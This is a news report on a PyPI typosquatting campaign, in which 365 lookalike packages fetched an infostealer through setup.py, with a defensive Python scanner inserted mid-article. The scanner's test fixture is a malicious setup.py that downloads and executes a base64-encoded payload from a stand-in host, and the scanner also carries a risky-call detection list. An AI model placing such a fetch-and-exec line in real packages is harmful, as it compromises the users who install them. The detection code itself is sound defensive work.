
The Python package repository PyPI was forced to intervene after packages that executed malicious code on users' devices were uploaded. For a time it was also not possible to create new projects.

PyPI has since returned to normal operation. However, registering new users and creating projects was not possible for 10 hours. Given PyPI's popularity, that measure inconvenienced many developers. The repository is widely used within the Python community as a source of code libraries, giving developers quick access to software code.

Because many Python developers rely on PyPI, it is an attractive target for attackers, who could abuse it to spread malicious code and gain access to the systems of large companies. That is exactly what happened between March 27 and March 28, leading to the halt on registrations and project creation.

Operation of malware

An analysis by security firm Checkmarx provides insight into what happened at PyPI. This week, a cybercriminal uploaded 365 packages whose names mimicked those of legitimate projects. The packages contained malicious code in the setup.py file, which is executed during installation. At that point the code attempts to retrieve a second payload from a remote server. If successful, an infostealer is placed on the system that targets data in web browsers, including passwords, cookies, and extension data. It also attempts to steal crypto wallets.
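Two defensive checks that target the behaviour described above, written as an added example rather than code from the article or from Checkmarx: a static scan of a setup.py for calls that would execute at install time (network fetch, decoding, code execution), and a lookalike-name check against a list of known-good projects. The setup.py texts and package names below are constructed for illustration.

```python
import ast
import difflib

# Constructed sample resembling the described technique: a module-level
# fetch of a second-stage payload, executed when pip runs setup.py.
SUSPICIOUS_SETUP = '''
from setuptools import setup
import base64, urllib.request
data = urllib.request.urlopen("http://example.invalid/stage2").read()
exec(base64.b64decode(data))
setup(name="requestz", version="0.0.1")
'''

BENIGN_SETUP = '''
from setuptools import setup
setup(name="mypkg", version="1.0", packages=["mypkg"])
'''

# Calls that rarely belong at import time in a legitimate setup.py.
RISKY_CALLS = {"exec", "eval", "urlopen", "urlretrieve", "b64decode",
               "system", "Popen", "check_output"}

def flag_setup_py(source: str) -> list[str]:
    """Return the risky call names found in a setup.py, in source order."""
    calls = [n for n in ast.walk(ast.parse(source)) if isinstance(n, ast.Call)]
    hits = []
    for node in sorted(calls, key=lambda n: (n.lineno, n.col_offset)):
        fn = node.func
        # Plain name (exec(...)) or attribute (urllib.request.urlopen(...)).
        name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", None)
        if name in RISKY_CALLS:
            hits.append(name)
    return hits

# Constructed allowlist of legitimate project names (assumption).
KNOWN_GOOD = ["cryptography", "numpy", "pandas", "requests"]

def typosquat_candidates(requested: list[str], cutoff: float = 0.85) -> list[tuple[str, str]]:
    """Return (requested, lookalike) pairs for names that nearly match a
    known-good project but are not that project. A cutoff of 0.85 catches
    one-character edits on common names while leaving exact names alone."""
    flagged = []
    for name in requested:
        if name in KNOWN_GOOD:
            continue
        match = difflib.get_close_matches(name, KNOWN_GOOD, n=1, cutoff=cutoff)
        if match:
            flagged.append((name, match[0]))
    return flagged
```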

It is unclear how many users are affected by the attack. After 10 hours, PyPI was working again, indicating that the problem had been fixed.
